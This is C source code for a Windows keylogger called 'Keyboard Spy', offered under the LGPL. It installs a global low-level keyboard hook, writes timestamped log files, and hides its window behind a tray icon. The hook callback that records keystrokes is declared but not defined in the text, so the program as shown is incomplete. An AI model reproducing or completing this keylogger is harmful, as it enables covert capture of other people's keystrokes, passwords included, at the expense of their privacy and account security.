/*12 / 01 / 2005*/
/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU Lesser General Public License .
 */
/* Created by Dev-C++ 5 Beta version 4.9.9.2 */
/*codename:DR-P-4*/
/*Keyboard Spy 0.0.1.0 for Windows.*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <shellapi.h>
#include <tchar.h>
#include "resource.h"


static SYSTEMTIME Time;
HHOOK hHook=NULL;
char Filename[64];
int File_number=0;
FILE *ARCHIVES;
NOTIFYICONDATA NotifyIconData;

/*  Declare Windows procedure  */
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
LRESULT CALLBACK LowLevelKeyboardProc(int,WPARAM ,LPARAM );
BOOL CALLBACK AboutDlgProc(HWND, UINT, WPARAM, LPARAM);


/*  Make the class name into a global variable  */
char szClassName[ ] = "Keyboard Spy";

int WINAPI WinMain (HINSTANCE hThisInstance,
                    HINSTANCE hPrevInstance,
                    LPSTR lpszArgument,
                    int nFunsterStil)

{
    HWND hwnd;               /* This is the handle for our window */
    MSG messages;            /* Here messages to the application are saved */
    WNDCLASSEX wincl;        /* Data structure for the windowclass */

    /* The Window structure */
    wincl.hInstance = hThisInstance;
    wincl.lpszClassName = szClassName;
    wincl.lpfnWndProc = WindowProcedure;      /* This function is called by windows */
    wincl.style = CS_DBLCLKS;                 /* Catch double-clicks */
    wincl.cbSize = sizeof (WNDCLASSEX);

    /* Use default icon and mouse-pointer */
    wincl.hIcon = LoadIcon(GetModuleHandle(NULL), MAKEINTRESOURCE(ID_ICON));
    wincl.hIconSm = (HICON)LoadImage(GetModuleHandle(NULL), MAKEINTRESOURCE(ID_ICON),IMAGE_ICON, 16, 16, 0);
    wincl.hCursor = LoadCursor (NULL, IDC_ARROW);
    wincl.lpszMenuName = NULL;                 /* No menu */
    wincl.cbClsExtra = 0;                      /* No extra bytes after the window class */
    wincl.cbWndExtra = 0;                      /* structure or the window instance */
    /* Use Windows's default color as the background of the window */
    wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;
    
    /* Register the window class, and if it fails quit the program */
    if (!RegisterClassEx (&wincl))
        return 0;

    /* The class is registered, let's create the program*/
    hwnd = CreateWindowEx (
           0,                   /* Extended possibilites for variation */
           szClassName,         /* Classname */
           "Keyboard Spy Beta 0.1",       /* Title Text */
           WS_OVERLAPPED | WS_CAPTION | WS_SYSMENU | WS_MINIMIZEBOX, /* default window */
           CW_USEDEFAULT,       /* Windows decides the position */
           CW_USEDEFAULT,       /* where the window ends up on the screen */
           200,                 /* The programs width */
           150,                 /* and height in pixels */
           HWND_DESKTOP,        /* The window is a child-window to desktop */
           NULL,                /* No menu */
           hThisInstance,       /* Program Instance handler */
           NULL                 /* No Window Creation data */
           );
    
    hHook=SetWindowsHookEx(WH_KEYBOARD_LL,LowLevelKeyboardProc,hThisInstance,0);
    
    do
     {
      File_number++;
      sprintf(Filename,"archives%d.txt",File_number);
      ARCHIVES=fopen(Filename,"r");
     }
     while (ARCHIVES!=NULL);
 
    ARCHIVES=fopen(Filename,"w");
    GetLocalTime(&Time);
    fprintf(ARCHIVES,"Keyboard Spy started at %d/%d/%d %d:%d:%d\n",
    Time.wMonth,Time.wDay,Time.wYear,Time.wHour,Time.wMinute,Time.wSecond);
    fprintf(ARCHIVES,"Archives:\n");
    fclose(ARCHIVES);
    
    MessageBox(NULL,"Keyboard Spy is running now.\narchives(x).txt was created.","Message"
    ,MB_ICONINFORMATION | MB_OK);
    
    NotifyIconData.cbSize = sizeof(NOTIFYICONDATA);
    NotifyIconData.hWnd = hwnd;
    NotifyIconData.uID = ID_ICON;
    NotifyIconData.hIcon = LoadIcon(GetModuleHandle(NULL), MAKEINTRESOURCE(ID_ICON));
    NotifyIconData.uFlags = NIF_MESSAGE | NIF_ICON | NIF_TIP;
    NotifyIconData.uCallbackMessage = ID_DISPLAY;
    _tcscpy(NotifyIconData.szTip, _T("Keyboard Spy is running."));
    Shell_NotifyIcon(NIM_ADD,&NotifyIconData);
    
    /* Make the window visible on the screen */
    ShowWindow (hwnd,SW_HIDE);

    /* Run the message loop. It will run until GetMessage() returns 0 */
    while (GetMessage (&messages, NULL, 0, 0))
    {
        /* Translate virtual-key messages into character messages */
        TranslateMessage(&messages);
        /* Send message to WindowProcedure */
        DispatchMessage(&messages);
    }
    /* The program return-value is 0 - The value that PostQuitMessage() gave */
    return messages.wParam;
}

/*  This function is called by the Windows function DispatchMessage()  */

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
{
    switch (message)                  /* handle the messages */
    {
     static HWND hwndButton=(0);
     static HINSTANCE hInstance;
        case WM_CREATE:
         {
          hwndButton = CreateWindow ("button","Abort KeySpy",
          WS_CHILD | WS_VISIBLE | BS_PUSHBUTTON,
          45,40,100,40,hwnd,(HMENU)ID_ABOUT,((LPCREATESTRUCT) lParam)->hInstance,NULL);       
         }   
        break;
        
        case WM_SYSCOMMAND:
         {
             if(SC_MINIMIZE==wParam)
              {
               ShowWindow(hwnd,SW_HIDE); 
               return TRUE;
              }
              if(SC_CLOSE==wParam)
              {
               ARCHIVES=fopen(Filename,"a");
               fprintf(ARCHIVES,"\n*STOP*");
               GetLocalTime(&Time);
               fprintf(ARCHIVES,"\nKeyboard Spy closed at %d/%d/%d %d:%d:%d",
               Time.wMonth,Time.wDay,Time.wYear,Time.wHour,Time.wMinute,Time.wSecond);
               fclose(ARCHIVES);    
               Shell_NotifyIcon(NIM_DELETE,&NotifyIconData);
               SendMessage (hwnd,WM_DESTROY,0,0);
              }
         }
        break;
        
        case ID_DISPLAY:
         {
          if (WM_LBUTTONDOWN==lParam)
           {ShowWindow (hwnd,SW_SHOW);}
         }           
        break;
        
        case WM_COMMAND:
             switch (LOWORD (wParam))
              {
               case ID_ABOUT:
                    DialogBox(hInstance,TEXT("AboutBox"),hwnd,AboutDlgProc);  
               break;        
              }
        break;
        
        case WM_DESTROY:
            PostQuitMessage (0);       /* send a WM_QUIT to the message queue */
        break;
        
        default:                      /* for messages that we don't deal with */
            return DefWindowProc (hwnd, message, wParam, lParam);
    }

    return 0;
}

